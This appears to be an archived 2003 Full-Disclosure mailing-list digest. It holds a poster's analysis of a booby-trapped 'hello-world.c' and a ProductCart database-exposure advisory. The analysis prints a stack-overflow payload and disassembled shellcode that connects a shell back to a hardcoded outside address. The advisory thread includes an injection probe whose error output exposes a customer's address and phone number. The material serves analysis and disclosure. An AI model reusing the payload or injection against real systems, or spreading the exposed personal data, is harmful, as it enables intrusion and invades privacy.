> > Sent: Friday, June 27, 2003 6:25 AM
> > Subject: [Full-Disclosure] tripbid secure codes
> >
> >
> > >i post the thing to the vuln dev some days ago and get quite a big
> > respnose.
> > >not only do i get a heart 2 heat with n1xo reiman about portmon ! but
> > >some folks want me to look at the code they make, specially a 'hello-
> > >world.c' progie -> " holo, can you check my hello-world.c for strcpy
> > >?? securecode do the trick " <- paraphase the msg, i rm -rf / it since
> > >it make me anger and stress it !
> > >
> > >i am willing to try the secure code since the grep 'strcpy' is losing
> > >his thrills so i trick around with :
> > >[user@localhost]$ ./securecode -s hello-world.c
> >
> >
> > Never ever EVER run an insecure program over arbitrary data you receive from
> > the net without checking it for safety first..... Let's look at this
> > hello-world.c before we run anything on it....
> >
> >
> > Z:\sploits-misc\targzip>type hello-world.c
> > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!?
> > ?!? ?!? ?!? ?!? ?!? ?!?
> > ?!??��1?1?1?Q??Q??Q??Q��???f?��?1?1?QQh?b??fh????fQ�???SWR��???f?�1?9?t?1????�1???�??�1???�????�1???�????�1?1?Phn/shh//bi�?PS��???�1????�
> >
> >
> > Heh. Boy, did j00 get hax0red! Here's what's actually in that file:
> >
> > $0000 - $00ff: 'A' x 256
> > $0100 - $011f: DWORD $bffff321 x 8
> > $0120 - $0378 $90 = NOP x 600
> > $0378 - $03fa: Binary shellcode
> > $03fb - $03fc: CR, LF
> > <EOF>
> >
> > In other words, it's one very long line. Looks to me like the securecode
> > program reads each line of the .c file into a buffer that's only 256 bytes
> > long; this exploit fills it with 'A', then overwrites the return address on
> > the stack with a pointer into the NOP slide. Here's a disassembly of the
> > shellcode: note that offset 0 in this disassembly is offset $0370 in the
> > file. Sorry for not commenting this, but I don't speak linux asm; however I
> > can see a whole bunch of syscalls going on in there; the values in eax
> > should tell you whether anything nastier than a few mkdirs was done to
> > you...
> >
> > Z:\sploits-misc\targzip>objdump -D --target=binary
> > hello-world2.bin --architectu
> > re=i386
> >
> > hello-world2.bin: file format binary
> >
> > objdump: hello-world2.bin: no symbols
> > Disassembly of section .data:
> >
> > 00000000 <.data>:
> > 0: 90 nop
> > 1: 90 nop
> > 2: 90 nop
> > 3: 90 nop
> > 4: 90 nop
> > 5: 90 nop
> > 6: 90 nop
> > 7: 90 nop
> > 8: 90 nop
> > 9: 31 c0 xor %eax,%eax
> > b: 31 db xor %ebx,%ebx
> > d: 31 c9 xor %ecx,%ecx
> > f: 51 push %ecx
> > 10: b1 06 mov $0x6,%cl
> > 12: 51 push %ecx
> > 13: b1 01 mov $0x1,%cl
> > 15: 51 push %ecx
> > 16: b1 02 mov $0x2,%cl
> > 18: 51 push %ecx
> > 19: 89 e1 mov %esp,%ecx
> > 1b: b3 01 mov $0x1,%bl
> > 1d: b0 66 mov $0x66,%al
> > 1f: cd 80 int $0x80
> > 21: 89 c2 mov %eax,%edx
> > 23: 31 c0 xor %eax,%eax
> > 25: 31 c9 xor %ecx,%ecx
> > 27: 51 push %ecx
> > 28: 51 push %ecx
> > 29: 68 d4 62 f7 cc push $0xccf762d4
> > 2e: 66 68 b0 ef pushw $0xefb0
> > 32: b1 02 mov $0x2,%cl
> > 34: 66 51 push %cx
> > 36: 89 e7 mov %esp,%edi
> > 38: b3 10 mov $0x10,%bl
> > 3a: 53 push %ebx
> > 3b: 57 push %edi
> > 3c: 52 push %edx
> > 3d: 89 e1 mov %esp,%ecx
> > 3f: b3 03 mov $0x3,%bl
> > 41: b0 66 mov $0x66,%al
> > 43: cd 80 int $0x80
> > 45: 31 c9 xor %ecx,%ecx
> > 47: 39 c1 cmp %eax,%ecx
> > 49: 74 06 je 0x51
> > 4b: 31 c0 xor %eax,%eax
> > 4d: b0 01 mov $0x1,%al
> > 4f: cd 80 int $0x80
> > 51: 31 c0 xor %eax,%eax
> > 53: b0 3f mov $0x3f,%al
> > 55: 89 d3 mov %edx,%ebx
> > 57: cd 80 int $0x80
> > 59: 31 c0 xor %eax,%eax
> > 5b: b0 3f mov $0x3f,%al
> > 5d: 89 d3 mov %edx,%ebx
> > 5f: b1 01 mov $0x1,%cl
> > 61: cd 80 int $0x80
> > 63: 31 c0 xor %eax,%eax
> > 65: b0 3f mov $0x3f,%al
> > 67: 89 d3 mov %edx,%ebx
> > 69: b1 02 mov $0x2,%cl
> > 6b: cd 80 int $0x80
> > 6d: 31 c0 xor %eax,%eax
> > 6f: 31 d2 xor %edx,%edx
> > 71: 50 push %eax
> > 72: 68 6e 2f 73 68 push $0x68732f6e
> > 77: 68 2f 2f 62 69 push $0x69622f2f
> > 7c: 89 e3 mov %esp,%ebx
> > 7e: 50 push %eax
> > 7f: 53 push %ebx
> > 80: 89 e1 mov %esp,%ecx
> > 82: b0 0b mov $0xb,%al
> > 84: cd 80 int $0x80
> > 86: 31 c0 xor %eax,%eax
> > 88: b0 01 mov $0x1,%al
> > 8a: cd 80 int $0x80
> > 8c: 0d .byte 0xd
> > 8d: 0a .byte 0xa
> >
> >
> >
> > DaveK
> >
> > _________________________________________________________________
> > Sign-up for a FREE BT Broadband connection today!
> > http://www.msn.co.uk/specials/btbroadband
> >
> >
> > --__--__--
> >
> > Message: 8
> > Date: Sun, 6 Jul 2003 11:07:22 -0400 (EDT)
> > From: "Larry W. Cashdollar" <lwc@vapid.ath.cx>
> > To: <full-disclosure@lists.netsys.com>
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file
> > can be downloaded remotely
> >
> >
> >
> > 949 is a legit zip code in cali.
> >
> >
> > On Sat, 5 Jul 2003, KF wrote:
> >
> > > Was that legit California data? I am sure than making someone have a
> > > nice weekend you just made multiple someones have a shitty month ahead
> > > of them...
> > > http://www.theregister.co.uk/content/55/31509.html
> > >
> > > -KF
> > >
> > > gyrniff wrote:
> > >
> > > >URL:
> > > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > > >Change the name Paul to Paul'
> > > >
> > > >Microsoft OLE DB Provider for ODBC Drivers
> > > > error '80040e14'
> > > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > > >address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> > > >
> > > >have a nice weekend ;-)
> > > >
> > > >On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > > >
> > > >
> > > >>ProductCart database file can be downloaded remotely
> > > >>=================================================
> > > >>
> > > >>PROGRAM: ProductCart
> > > >>HOMEPAGE: http://www.earlyimpact.com/productcart/
> > > >>VULNERABLE VERSIONS: 1.0 to 2.0
> > > >>RISK: High
> > > >>
> > > >>
> > > >>DESCRIPTION
> > > >>=================================================
> > > >>
> > > >>ProductCart� is an ASP shopping cart that combines sophisticated
> > > >>ecommerce features with time-saving store management tools and remarkable
> > > >>ease of use. It is widely used by many e-commerce sites.
> > > >>
> > > >>DETAILS
> > > >>=================================================
> > > >>
> > > >>In the default installation, product cart database file is located at
> > > >>/productcart/database/EIPC.mdb which can be accessed easily
> > > >>by any remote attackers.
> > > >>
> > > >>Sample: http://victimhost/productcart/database/EIPC.mdb
> > > >>
> > > >>The database file includes the store administration password as well as
> > > >>customer's info (including credit card info).
> > > >>
> > > >>
> > > >> WORKAROUND
> > > >>=================================================
> > > >>
> > > >>Rename the database file, put it in a protected directory.
> > > >>
> > > >>
> > > >>CREDITS
> > > >>=================================================
> > > >>
> > > >>Discovered by Tri Huynh from Sentry Union
> > > >>
> > > >>
> > > >>DISLAIMER
> > > >>=================================================
> > > >>
> > > >>The information within this paper may change without notice. Use of
> > > >>this information constitutes acceptance for use in an AS IS condition.
> > > >>There are NO warranties with regard to this information. In no event
> > > >>shall the author be liable for any damages whatsoever arising out of
> > > >>or in connection with the use or spread of this information. Any use
> > > >>of this information is at the user's own risk.
> > > >>
> > > >>
> > > >>FEEDBACK
> > > >>=================================================
> > > >>
> > > >>Please send suggestions, updates, and comments to: trihuynh@zeeup.com
> > > >>
> > > >>
> > > >
> > > >_______________________________________________
> > > >Full-Disclosure - We believe in it.
> > > >Charter: http://lists.netsys.com/full-disclosure-charter.html
> > > >
> > > >
> > > >
> > >
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> >
> >
> > --__--__--
> >
> > Message: 9
> > From: "Kristian Hermansen" <this_is_kris@hotmail.com>
> > To: <full-disclosure@lists.netsys.com>
> > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again )
> > Date: Tue, 1 Jul 2003 22:49:59 -0400
> >
> > Yes, programmers should be trained to write better code...but it is more
> > profitiable to allow sloppy code and a simple fix later (behind the scenes
> > with vendor notification). This is MS point-of-view. This is why they want
> > vendor notification, rather than public notification. Again, I say let the
> > 0-days fly.
> >
> > Did you know that certain US government agencies have teams that their only
> > job is to break software? This has been going on since the 1970's. It
> > helps to produce secure code in mission critical applications that the
> > military needs. I am not saying that MS needs to be SO drastic...but a
> > small team for their MOST popular products would sure be wise to start with.
> > Why not hire fucking intern teenagers from russia to "Crash Test" their
> > development projects (facetious)? Would it be so difficult/expensive to
> > hire some of the main companies that are breaking your software???
> >
> > Kris Hermansen
> >
> > ----- Original Message -----
> > From: "Schmehl, Paul L" <pauls@utdallas.edu>
> > To: <full-disclosure@lists.netsys.com>
> > Sent: Tuesday, July 01, 2003 6:58 PM
> > Subject: RE: [Full-Disclosure] Microsoft Cries Wolf ( again )
> >
> >
> > > > -----Original Message-----
> > > > From: Kristian Hermansen [mailto:this_is_kris@hotmail.com]
> > > > Sent: Tuesday, July 01, 2003 3:09 PM
> > > > To: full-disclosure@lists.netsys.com
> > > > Subject: Re: [Full-Disclosure] Microsoft Cries Wolf ( again )
> > > >
> > > >
> > > > I agree. It is not our problem. The reason is this.
> > > > Microsoft would like to reduce costs. Fixing bugs in
> > > > products costs money, and 0-day bugs need immediate fixes
> > > > which slow down MS total output ability. They would like to
> > > > see everyone reporting to the vendor first because this saves
> > > > them money!!! In this respect, this also allows them to go on
> > > > writing sloppy code in order to save a few bucks on every
> > > > product, thus reducing their overhead. I don't want sloppy
> > > > code. Let the 0-days fly....maybe MS will start doing
> > > > extensive testing to their products before they release it
> > > > for sale to millions of customers. I thought .NET was
> > > > supposed to fix all this ;-P
> > >
> > > That's too funny. Microsoft ran a "buffer overflow finder" against the
> > > codebase for XP, and the VP in charge announced publicly that they had
> > > "eliminated buffer overflows in XP". Within thirty days, eEye announced
> > > the UPnP vulnerability in SSDP, which is the single most devastating
> > > hole ever found in MS products. (You can compromise an entire network
> > > of XP machines with one attack, simultaneously.)
> > >
> > > You don't fix code by extensive testing. You fix it by teaching how to
> > > write secure code to begin with *and* by ongoing, consistent audits done
> > > before code is released. (OpenBSD has been doing this for years, and
> > > look at the results.)
> > >
> > > Paul Schmehl (pauls@utdallas.edu)
> > > Adjunct Information Security Officer
> > > The University of Texas at Dallas
> > > AVIEN Founding Member
> > > http://www.utdallas.edu/~pauls/
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> >
> >
> > --__--__--
> >
> > _______________________________________________
> > Full-Disclosure mailing list
> > Full-Disclosure@lists.netsys.com
> > http://lists.netsys.com/mailman/listinfo/full-disclosure
> >
> >
> > End of Full-Disclosure Digest
> --
> Markus Nielsen <intercool@sexmagnet.com>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Rick: "[Full-Disclosure] rundll32.exe buffer overflow"

Previous message: Markus Nielsen: "[Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #933 - 11 msgs"
In reply to: Markus Nielsen: "[Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #933 - 11 msgs"
Next in thread: petard: "[Full-Disclosure] digest annoyances"
Reply: petard: "[Full-Disclosure] digest annoyances"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]